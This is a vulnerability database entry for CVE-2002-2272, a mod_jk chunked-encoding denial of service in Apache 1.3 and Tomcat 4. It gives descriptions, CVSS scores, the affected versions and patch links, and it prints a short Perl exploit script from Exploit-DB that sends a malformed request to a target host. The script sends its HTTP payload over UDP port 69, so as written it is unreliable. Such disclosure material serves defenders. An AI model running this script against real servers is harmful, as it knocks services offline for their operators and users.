CVE-2002-2272
CVSS 7.8
Published: 2002-12-31 00:00:00
Last revised: 2008-09-05 16:32:47
NMCOE    

[Original] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.


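[CNNVD] Apache/Tomcat Mod_JK chunked encoding remote denial-of-service vulnerability (CNNVD-200212-149)

        
        Apache Webserver and Tomcat are HTTP server programs developed and maintained by the Apache project; they run on Unix, Linux and Windows operating systems.
        The mod_jk module has a design flaw: a remote attacker can exploit this vulnerability by sending malformed requests that desynchronize the Apache web server's communication between Apache and Tomcat, resulting in a denial of service.
        Mod_jk is an Apache module that lets Apache transparently forward web requests to the Tomcat engine and supports several protocols. When these components are combined, a flaw in the communication protocol implemented by mod_jk allows a malicious user to desynchronize Apache-Tomcat communication. An attacker can connect to the target machine and submit several malformed web requests containing invalid chunked-encoding data; because Mod_jk parses chunked requests incorrectly, repeated requests can cause the server to stop responding to legitimate requests.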
        

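- CVSS (base score)

CVSS score: 7.8 [HIGH]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: COMPLETE [may bring the system down completely]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: NETWORK [the attacker needs neither internal-network nor local access]
Authentication: NONE [exploitation requires no authentication]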

- CWE (weakness category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (affected platforms and products)

cpe:/a:apache:tomcat:4.0.6 Apache Software Foundation Tomcat 4.0.6
cpe:/a:apache:http_server:1.3.16 Apache Software Foundation Apache 1.3.16
cpe:/a:apache:http_server:1.3.10 Apache Software Foundation Apache 1.3.10
cpe:/a:apache:tomcat:4.1.10 Apache Software Foundation Tomcat 4.1.10
cpe:/a:apache:http_server:1.3.15 Apache Software Foundation Apache 1.3.15
cpe:/a:apache:tomcat:4.0.5 Apache Software Foundation Tomcat 4.0.5
cpe:/a:apache:http_server:1.3.11 Apache Software Foundation Apache HTTP Server 1.3.11
cpe:/a:apache:http_server:1.3 Apache Software Foundation Apache HTTP Server 1.3
cpe:/a:apache:http_server:1.3.19 Apache Software Foundation Apache HTTP Server 1.3.19
cpe:/a:apache:http_server:1.3.2 Apache Software Foundation Apache HTTP Server 1.3.2
cpe:/a:apache:http_server:1.3.24 Apache Software Foundation Apache HTTP Server 1.3.24
cpe:/a:apache:tomcat:4.0.4 Apache Software Foundation Tomcat 4.0.4
cpe:/a:apache:tomcat:4.0.3 Apache Software Foundation Tomcat 4.0.3
cpe:/a:apache:http_server:1.3.13 Apache Software Foundation Apache 1.3.13
cpe:/a:apache:http_server:1.3.0 Apache Software Foundation Apache HTTP Server 1.3.0
cpe:/a:apache:http_server:1.3.12 Apache Software Foundation Apache HTTP Server 1.3.12
cpe:/a:apache:tomcat:4.1.12 Apache Software Foundation Tomcat 4.1.12
cpe:/a:apache:http_server:1.3.26 Apache Software Foundation Apache HTTP Server 1.3.26
cpe:/a:apache:http_server:1.3.27 Apache Software Foundation Apache HTTP Server 1.3.27
cpe:/a:apache:tomcat:4.1.2 Apache Software Foundation Tomcat 4.1.2
cpe:/a:apache:tomcat:4.1.1 Apache Software Foundation Tomcat 4.1.1
cpe:/a:apache:tomcat:4.1.3 Apache Software Foundation Tomcat 4.1.3
cpe:/a:apache:http_server:1.3.14 Apache Software Foundation Apache HTTP Server 1.3.14
cpe:/a:apache:tomcat:4.1.0 Apache Software Foundation Tomcat 4.1.0
cpe:/a:apache:http_server:1.3.1 Apache Software Foundation Apache HTTP Server 1.3.1
cpe:/a:apache:http_server:1.3.18 Apache Software Foundation Apache HTTP Server 1.3.18
cpe:/a:apache:http_server:1.3.17 Apache Software Foundation Apache HTTP Server 1.3.17
cpe:/a:apache:http_server:1.3.22 Apache Software Foundation Apache HTTP Server 1.3.22
cpe:/a:apache:http_server:1.3.20 Apache Software Foundation Apache HTTP Server 1.3.20
cpe:/a:apache:http_server:1.3.25 Apache Software Foundation Apache HTTP Server 1.3.25
cpe:/a:apache:tomcat:4.0.1 Apache Software Foundation Tomcat 4.0.1
cpe:/a:apache:tomcat:4.0.2 Apache Software Foundation Tomcat 4.0.2
cpe:/a:apache:tomcat:4.0.0 Apache Software Foundation Tomcat 4.0.0
cpe:/a:apache:tomcat:4.1.9:beta Apache Software Foundation Tomcat 4.1.9 beta
cpe:/a:apache:tomcat:4.1.3:beta Apache Software Foundation Tomcat 4.1.3 beta
cpe:/a:apache:http_server:1.3.23 Apache Software Foundation Apache HTTP Server 1.3.23

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2272
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2272
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-149
(Official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/6320
(PATCH)  BID  6320
http://archives.neohapsis.com/archives/bugtraq/2002-12/0045.html
(PATCH)  BUGTRAQ  20021204 Apache/Tomcat Denial Of Service And Information Leakage Vulnerability
http://xforce.iss.net/xforce/xfdb/10771
(UNKNOWN)  XF  tomcat-modjk-get-bo(10771)

- Vulnerability information

Apache/Tomcat Mod_JK chunked encoding remote denial-of-service vulnerability
High risk  Other
2002-12-31 00:00:00 2002-12-31 00:00:00
Remote
        
        

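- Advisories and patches

        Vendor patch:
        Apache Software Foundation
        --------------------------
        The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page:
        
        http://jakarta.apache.org/tomcat/index.html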

- Vulnerability information (22068)

Apache 1.3.x, Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial Of Service Vulnerability (EDBID:22068)
unix dos
2002-12-04 Verified
0 Sapient2003
N/A
source: http://www.securityfocus.com/bid/6320/info

Apache Webserver and Tomcat are HTTP servers maintained and distributed by the Apache project. Apache Webserver and Tomcat are available for the Unix, Linux, and Microsoft Windows platforms.

It has been reported that a denial of service exists in Apache Webserver and Tomcat when mod_jk is used. Due to design problems in the module, a user submitting malicious requests to the Apache Webserver may cause desynchronization between Apache and Tomcat. This could be done through malicious chunked encoding requests.

#!/usr/bin/perl -w

use IO::Socket;

$vuln = "Apache 1.3.x, Tomcat 4.x Server, mod_jk 1.2 using Apache Jserv
Protocol 1.3";

unless (@ARGV == 1) {
  print "\n By Sapient2003\n";
  die "usage: $0 <host to exploit>\n";
}
print "\n By Sapient2003\n";

$buffer = "GET / HTTP/1.0\nHost: $ARGV[0]\nTransfer-ENcoding:
Chunked\n53636f7474";

$sock = IO::Socket::INET->new(
        PeerAddr => $ARGV[0],
        PeerPort => 69,
        Proto    => "udp",
) or die "Can't find host $ARGV[0]\n";
print $sock $buffer;
print "Attempted to exploit $ARGV[0]\n";
close($sock);

- Vulnerability information

7394
Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
Remote / Network Access Denial of Service
Loss of Availability

- Vulnerability description

- Timeline

2002-12-04 Unknown
Unknown Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
